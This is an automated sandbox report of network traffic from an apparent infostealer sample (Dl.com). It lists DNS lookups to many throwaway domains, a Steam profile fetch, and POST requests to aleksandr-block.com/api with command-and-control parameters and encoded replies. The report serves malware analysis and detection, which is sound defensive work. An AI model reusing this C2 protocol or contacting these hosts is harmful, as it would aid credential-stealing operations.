                                                                  Jan 15, 2025 16:02:01.444942951 CET44349922188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:02:01.445065975 CET49922443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:02:01.445097923 CET44349922188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:02:01.445126057 CET49922443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:02:01.445256948 CET49922443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:02:01.445295095 CET49922443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:02:01.454014063 CET44349922188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:02:01.454267979 CET49922443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:02:01.454305887 CET44349922188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:02:01.454330921 CET49922443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:02:01.454368114 CET49922443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:02:01.454447031 CET49922443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:02:01.459373951 CET44349922188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:02:03.152559042 CET44349922188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:02:03.152646065 CET44349922188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:02:03.152704954 CET49922443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:02:03.152843952 CET49922443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:02:03.152863979 CET44349922188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:02:03.156790018 CET49936443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:02:03.156830072 CET44349936188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:02:03.156904936 CET49936443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:02:03.157224894 CET49936443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:02:03.157238007 CET44349936188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:02:03.680839062 CET44349936188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:02:03.680927992 CET49936443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:02:03.687006950 CET49936443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:02:03.687020063 CET44349936188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:02:03.687333107 CET44349936188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:02:03.688608885 CET49936443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:02:03.688632011 CET49936443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:02:03.688673019 CET44349936188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:02:04.255961895 CET44349936188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:02:04.256072998 CET44349936188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:02:04.256159067 CET49936443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:02:04.256481886 CET49936443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:02:04.256504059 CET44349936188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:02:04.256520987 CET49936443192.168.2.5188.114.96.3
                                                                  Jan 15, 2025 16:02:04.256527901 CET44349936188.114.96.3192.168.2.5
                                                                  Jan 15, 2025 16:02:04.387192011 CET49944443192.168.2.5162.159.135.233
                                                                  Jan 15, 2025 16:02:04.387248039 CET44349944162.159.135.233192.168.2.5
                                                                  Jan 15, 2025 16:02:04.387336016 CET49944443192.168.2.5162.159.135.233
                                                                  Jan 15, 2025 16:02:04.387682915 CET49944443192.168.2.5162.159.135.233
                                                                  Jan 15, 2025 16:02:04.387697935 CET44349944162.159.135.233192.168.2.5
                                                                  Jan 15, 2025 16:02:04.854471922 CET44349944162.159.135.233192.168.2.5
                                                                  Jan 15, 2025 16:02:04.854583979 CET49944443192.168.2.5162.159.135.233
                                                                  Jan 15, 2025 16:02:04.857232094 CET49944443192.168.2.5162.159.135.233
                                                                  Jan 15, 2025 16:02:04.857250929 CET44349944162.159.135.233192.168.2.5
                                                                  Jan 15, 2025 16:02:04.857508898 CET44349944162.159.135.233192.168.2.5
                                                                  Jan 15, 2025 16:02:04.859390020 CET49944443192.168.2.5162.159.135.233
                                                                  Jan 15, 2025 16:02:04.907330036 CET44349944162.159.135.233192.168.2.5
                                                                  Jan 15, 2025 16:02:04.996174097 CET44349944162.159.135.233192.168.2.5
                                                                  Jan 15, 2025 16:02:04.996253967 CET44349944162.159.135.233192.168.2.5
                                                                  Jan 15, 2025 16:02:04.996541977 CET49944443192.168.2.5162.159.135.233
                                                                  Jan 15, 2025 16:02:04.996629000 CET49944443192.168.2.5162.159.135.233
                                                                  Jan 15, 2025 16:02:04.996629000 CET49944443192.168.2.5162.159.135.233
                                                                  Jan 15, 2025 16:02:04.996680975 CET44349944162.159.135.233192.168.2.5
                                                                  Jan 15, 2025 16:02:04.996711969 CET44349944162.159.135.233192.168.2.5

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jan 15, 2025 16:01:24.136158943 CET5406153192.168.2.51.1.1.1
                                                                  Jan 15, 2025 16:01:24.189687014 CET53540611.1.1.1192.168.2.5
                                                                  Jan 15, 2025 16:01:50.228715897 CET5715053192.168.2.51.1.1.1
                                                                  Jan 15, 2025 16:01:50.247328997 CET53571501.1.1.1192.168.2.5
                                                                  Jan 15, 2025 16:01:50.261992931 CET6247053192.168.2.51.1.1.1
                                                                  Jan 15, 2025 16:01:50.281842947 CET53624701.1.1.1192.168.2.5
                                                                  Jan 15, 2025 16:01:50.286997080 CET5270553192.168.2.51.1.1.1
                                                                  Jan 15, 2025 16:01:50.295594931 CET53527051.1.1.1192.168.2.5
                                                                  Jan 15, 2025 16:01:50.299901009 CET5989353192.168.2.51.1.1.1
                                                                  Jan 15, 2025 16:01:50.308933973 CET53598931.1.1.1192.168.2.5
                                                                  Jan 15, 2025 16:01:50.310498953 CET6068553192.168.2.51.1.1.1
                                                                  Jan 15, 2025 16:01:50.319529057 CET53606851.1.1.1192.168.2.5
                                                                  Jan 15, 2025 16:01:50.322617054 CET5890853192.168.2.51.1.1.1
                                                                  Jan 15, 2025 16:01:50.331232071 CET53589081.1.1.1192.168.2.5
                                                                  Jan 15, 2025 16:01:50.333689928 CET6046153192.168.2.51.1.1.1
                                                                  Jan 15, 2025 16:01:50.342828989 CET53604611.1.1.1192.168.2.5
                                                                  Jan 15, 2025 16:01:50.345675945 CET6236353192.168.2.51.1.1.1
                                                                  Jan 15, 2025 16:01:50.353919983 CET53623631.1.1.1192.168.2.5
                                                                  Jan 15, 2025 16:01:50.356372118 CET5364453192.168.2.51.1.1.1
                                                                  Jan 15, 2025 16:01:50.366900921 CET53536441.1.1.1192.168.2.5
                                                                  Jan 15, 2025 16:01:50.372777939 CET5779253192.168.2.51.1.1.1
                                                                  Jan 15, 2025 16:01:50.379503965 CET53577921.1.1.1192.168.2.5
                                                                  Jan 15, 2025 16:01:51.838295937 CET5467153192.168.2.51.1.1.1
                                                                  Jan 15, 2025 16:01:51.849912882 CET53546711.1.1.1192.168.2.5
                                                                  Jan 15, 2025 16:02:04.261001110 CET6344153192.168.2.51.1.1.1
                                                                  Jan 15, 2025 16:02:04.375099897 CET53634411.1.1.1192.168.2.5
                                                                  Jan 15, 2025 16:02:04.378706932 CET6160553192.168.2.51.1.1.1
                                                                  Jan 15, 2025 16:02:04.386483908 CET53616051.1.1.1192.168.2.5

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Jan 15, 2025 16:01:24.136158943 CET192.168.2.51.1.1.10x5392Standard query (0)HQzhESZXqNmORNSM.HQzhESZXqNmORNSMA (IP address)IN (0x0001)false
                                                                  Jan 15, 2025 16:01:50.228715897 CET192.168.2.51.1.1.10x258dStandard query (0)bustlingwakef.clickA (IP address)IN (0x0001)false
                                                                  Jan 15, 2025 16:01:50.261992931 CET192.168.2.51.1.1.10xc99Standard query (0)bloodyswif.latA (IP address)IN (0x0001)false
                                                                  Jan 15, 2025 16:01:50.286997080 CET192.168.2.51.1.1.10x5888Standard query (0)washyceehsu.latA (IP address)IN (0x0001)false
                                                                  Jan 15, 2025 16:01:50.299901009 CET192.168.2.51.1.1.10xe05Standard query (0)leggelatez.latA (IP address)IN (0x0001)false
                                                                  Jan 15, 2025 16:01:50.310498953 CET192.168.2.51.1.1.10x4a21Standard query (0)miniatureyu.latA (IP address)IN (0x0001)false
                                                                  Jan 15, 2025 16:01:50.322617054 CET192.168.2.51.1.1.10x82c2Standard query (0)kickykiduz.latA (IP address)IN (0x0001)false
                                                                  Jan 15, 2025 16:01:50.333689928 CET192.168.2.51.1.1.10xd0d0Standard query (0)savorraiykj.latA (IP address)IN (0x0001)false
                                                                  Jan 15, 2025 16:01:50.345675945 CET192.168.2.51.1.1.10x5fd8Standard query (0)shoefeatthe.latA (IP address)IN (0x0001)false
                                                                  Jan 15, 2025 16:01:50.356372118 CET192.168.2.51.1.1.10x2525Standard query (0)finickypwk.latA (IP address)IN (0x0001)false
                                                                  Jan 15, 2025 16:01:50.372777939 CET192.168.2.51.1.1.10x679fStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                  Jan 15, 2025 16:01:51.838295937 CET192.168.2.51.1.1.10xfe9cStandard query (0)aleksandr-block.comA (IP address)IN (0x0001)false
                                                                  Jan 15, 2025 16:02:04.261001110 CET192.168.2.51.1.1.10x4c89Standard query (0)klipjarifaa.shopA (IP address)IN (0x0001)false
                                                                  Jan 15, 2025 16:02:04.378706932 CET192.168.2.51.1.1.10x32c1Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Jan 15, 2025 16:01:24.189687014 CET1.1.1.1192.168.2.50x5392Name error (3)HQzhESZXqNmORNSM.HQzhESZXqNmORNSMnonenoneA (IP address)IN (0x0001)false
                                                                  Jan 15, 2025 16:01:50.247328997 CET1.1.1.1192.168.2.50x258dName error (3)bustlingwakef.clicknonenoneA (IP address)IN (0x0001)false
                                                                  Jan 15, 2025 16:01:50.281842947 CET1.1.1.1192.168.2.50xc99Name error (3)bloodyswif.latnonenoneA (IP address)IN (0x0001)false
                                                                  Jan 15, 2025 16:01:50.295594931 CET1.1.1.1192.168.2.50x5888Name error (3)washyceehsu.latnonenoneA (IP address)IN (0x0001)false
                                                                  Jan 15, 2025 16:01:50.308933973 CET1.1.1.1192.168.2.50xe05Name error (3)leggelatez.latnonenoneA (IP address)IN (0x0001)false
                                                                  Jan 15, 2025 16:01:50.319529057 CET1.1.1.1192.168.2.50x4a21Name error (3)miniatureyu.latnonenoneA (IP address)IN (0x0001)false
                                                                  Jan 15, 2025 16:01:50.331232071 CET1.1.1.1192.168.2.50x82c2Name error (3)kickykiduz.latnonenoneA (IP address)IN (0x0001)false
                                                                  Jan 15, 2025 16:01:50.342828989 CET1.1.1.1192.168.2.50xd0d0Name error (3)savorraiykj.latnonenoneA (IP address)IN (0x0001)false
                                                                  Jan 15, 2025 16:01:50.353919983 CET1.1.1.1192.168.2.50x5fd8Name error (3)shoefeatthe.latnonenoneA (IP address)IN (0x0001)false
                                                                  Jan 15, 2025 16:01:50.366900921 CET1.1.1.1192.168.2.50x2525Name error (3)finickypwk.latnonenoneA (IP address)IN (0x0001)false
                                                                  Jan 15, 2025 16:01:50.379503965 CET1.1.1.1192.168.2.50x679fNo error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                  Jan 15, 2025 16:01:51.849912882 CET1.1.1.1192.168.2.50xfe9cNo error (0)aleksandr-block.com188.114.96.3A (IP address)IN (0x0001)false
                                                                  Jan 15, 2025 16:01:51.849912882 CET1.1.1.1192.168.2.50xfe9cNo error (0)aleksandr-block.com188.114.97.3A (IP address)IN (0x0001)false
                                                                  Jan 15, 2025 16:02:04.375099897 CET1.1.1.1192.168.2.50x4c89Name error (3)klipjarifaa.shopnonenoneA (IP address)IN (0x0001)false
                                                                  Jan 15, 2025 16:02:04.386483908 CET1.1.1.1192.168.2.50x32c1No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                                                                  Jan 15, 2025 16:02:04.386483908 CET1.1.1.1192.168.2.50x32c1No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                                                                  Jan 15, 2025 16:02:04.386483908 CET1.1.1.1192.168.2.50x32c1No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                                                                  Jan 15, 2025 16:02:04.386483908 CET1.1.1.1192.168.2.50x32c1No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                                                                  Jan 15, 2025 16:02:04.386483908 CET1.1.1.1192.168.2.50x32c1No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false

                                                                  HTTP Request Dependency Graph

                                                                  • steamcommunity.com
                                                                  • aleksandr-block.com
                                                                  • cdn.discordapp.com

                                                                  HTTPS Proxied Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.549850104.102.49.2544435064C:\Users\user\AppData\Local\Temp\755831\Dl.com
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-15 15:01:51 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Host: steamcommunity.com
                                                                  2025-01-15 15:01:51 UTC1905INHTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                  Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                  Cache-Control: no-cache
                                                                  Date: Wed, 15 Jan 2025 15:01:51 GMT
                                                                  Content-Length: 35141
                                                                  Connection: close
                                                                  Set-Cookie: sessionid=5e4637e0a932401878dd7c39; Path=/; Secure; SameSite=None
                                                                  Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                  2025-01-15 15:01:51 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                  Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                  2025-01-15 15:01:51 UTC16384INData Raw: 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a
                                                                  Data Ascii: eamcommunity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">
                                                                  2025-01-15 15:01:51 UTC3768INData Raw: 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22
                                                                  Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="
                                                                  2025-01-15 15:01:51 UTC510INData Raw: 61 6e 6b 22 3e 53 74 65 61 6d 20 53 75 62 73 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22
                                                                  Data Ascii: ank">Steam Subscriber Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.549861188.114.96.34435064C:\Users\user\AppData\Local\Temp\755831\Dl.com
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-15 15:01:52 UTC266OUTPOST /api HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Content-Length: 8
                                                                  Host: aleksandr-block.com
                                                                  2025-01-15 15:01:52 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                  Data Ascii: act=life
                                                                  2025-01-15 15:01:52 UTC1138INHTTP/1.1 200 OK
                                                                  Date: Wed, 15 Jan 2025 15:01:52 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: PHPSESSID=m2khitsbo22m9vcp8kkodgb9am; expires=Sun, 11 May 2025 08:48:31 GMT; Max-Age=9999999; path=/
                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  X-Frame-Options: DENY
                                                                  X-Content-Type-Options: nosniff
                                                                  X-XSS-Protection: 1; mode=block
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Osp5IMrp%2FtTl%2FKplrrPImIIkit%2FUY0nZ9wiTBfhY82c%2BiKRaSOIX%2BrDbxjqj2r4tBoJUr4i%2BKU7cU6%2BDX%2BSH4INi5bnr2bFpyfwhGLTwKLSa3%2Fe1cUWWAVr8r26Nc6QddNAb3jyr"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 9026be5af829aaae-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=13672&min_rtt=13667&rtt_var=5137&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=910&delivery_rate=212921&cwnd=32&unsent_bytes=0&cid=5148a7281c853380&ts=516&x=0"
                                                                  2025-01-15 15:01:52 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                  Data Ascii: 2ok
                                                                  2025-01-15 15:01:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.549870188.114.96.34435064C:\Users\user\AppData\Local\Temp\755831\Dl.com
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-15 15:01:53 UTC267OUTPOST /api HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Content-Length: 47
                                                                  Host: aleksandr-block.com
                                                                  2025-01-15 15:01:53 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 56 58 47 44 52 2d 2d 4b 61 74 32 32 32 26 6a 3d
                                                                  Data Ascii: act=recive_message&ver=4.0&lid=VXGDR--Kat222&j=
                                                                  2025-01-15 15:01:53 UTC1126INHTTP/1.1 200 OK
                                                                  Date: Wed, 15 Jan 2025 15:01:53 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: PHPSESSID=hlsipdo5pbm3lvgng33f6p12ii; expires=Sun, 11 May 2025 08:48:32 GMT; Max-Age=9999999; path=/
                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  X-Frame-Options: DENY
                                                                  X-Content-Type-Options: nosniff
                                                                  X-XSS-Protection: 1; mode=block
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XHEflb48cU5ixHTf6BhhRWCsDkc5SBKug5OJCgt%2B1xEU%2BOwoi21Ekso2wZMFFDhn0QTEV5NZhV0z07bEvGB%2B1TRF4IUPHY5ywkUZ56kfT3oWDSL3ba4dPz5ydMRGpNQmwz0H38kR"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 9026be615d86aadc-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=14142&min_rtt=14138&rtt_var=5311&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=950&delivery_rate=205967&cwnd=32&unsent_bytes=0&cid=be164d5ac84dfcfb&ts=566&x=0"
                                                                  2025-01-15 15:01:53 UTC243INData Raw: 63 35 61 0d 0a 6f 54 6d 63 75 70 64 66 47 63 73 71 6e 42 61 62 5a 65 4a 32 75 52 31 72 30 56 6b 68 71 6d 42 38 34 73 46 79 32 61 47 31 61 70 76 61 47 2b 71 59 72 57 73 31 36 56 6e 35 4e 4b 45 52 6b 41 50 63 4d 55 6d 77 50 51 4f 51 42 68 32 4f 73 68 66 31 67 38 4d 48 75 5a 74 66 2f 64 62 6b 4f 6a 58 70 54 2b 51 30 6f 54 36 5a 56 4e 78 7a 53 65 74 37 52 4d 41 43 48 59 36 6a 45 37 4c 4f 78 51 62 34 79 56 58 37 30 76 49 38 66 61 70 47 38 58 50 2b 41 49 4d 63 31 33 51 47 75 54 51 44 68 6b 49 5a 6d 4f 4e 49 2b 2b 7a 51 48 76 72 73 57 4f 2f 52 74 53 49 31 73 41 6a 35 65 4c 6c 66 77 42 66 63 66 77 65 33 50 55 72 43 43 42 53 47 6f 68 61 7a 30 64 77 4d 38 38 6c 62 2b 4e 50 34 4e 57 6d 6e 54 50 5a 34 2b 41 71 44 56 4a 55 2f 44 71
                                                                  Data Ascii: c5aoTmcupdfGcsqnBabZeJ2uR1r0VkhqmB84sFy2aG1apvaG+qYrWs16Vn5NKERkAPcMUmwPQOQBh2Oshf1g8MHuZtf/dbkOjXpT+Q0oT6ZVNxzSet7RMACHY6jE7LOxQb4yVX70vI8fapG8XP+AIMc13QGuTQDhkIZmONI++zQHvrsWO/RtSI1sAj5eLlfwBfcfwe3PUrCCBSGohaz0dwM88lb+NP4NWmnTPZ4+AqDVJU/Dq
                                                                  2025-01-15 15:01:53 UTC1369INData Raw: 74 37 47 34 68 52 4c 49 4f 79 41 61 37 4f 78 77 36 35 33 42 58 6e 6d 50 49 78 4f 2f 45 49 39 6e 6a 33 41 6f 4d 62 33 48 34 4a 6f 54 52 44 79 77 6f 57 68 4b 6b 66 74 4d 7a 5a 41 76 37 4c 55 76 6e 58 38 6a 56 39 70 6b 75 2b 4f 72 6b 41 6d 46 53 44 50 79 6d 6a 4f 45 44 63 44 77 2f 41 76 46 36 69 67 39 41 45 75 5a 73 62 2b 4e 62 30 4d 48 75 37 51 50 56 2f 2f 42 57 4c 48 64 5a 79 43 62 34 78 54 4d 73 43 47 59 71 70 48 37 48 48 32 67 58 2f 77 31 75 2b 6c 72 55 36 59 2b 6b 51 76 6c 66 38 46 34 63 59 7a 54 30 7a 38 79 51 4e 30 55 49 5a 6a 4f 4e 49 2b 38 76 53 43 2f 72 49 56 50 33 51 2f 69 39 37 75 30 37 7a 63 65 73 42 68 52 72 52 66 42 75 35 4e 55 58 4c 43 78 57 4a 70 68 65 2f 67 35 6c 49 2f 74 73 62 70 70 6a 55 4d 48 43 6c 51 75 6c 30 75 52 6a 4f 44 5a 74 34 42
                                                                  Data Ascii: t7G4hRLIOyAa7Oxw653BXnmPIxO/EI9nj3AoMb3H4JoTRDywoWhKkftMzZAv7LUvnX8jV9pku+OrkAmFSDPymjOEDcDw/AvF6ig9AEuZsb+Nb0MHu7QPV//BWLHdZyCb4xTMsCGYqpH7HH2gX/w1u+lrU6Y+kQvlf8F4cYzT0z8yQN0UIZjONI+8vSC/rIVP3Q/i97u07zcesBhRrRfBu5NUXLCxWJphe/g5lI/tsbppjUMHClQul0uRjODZt4B
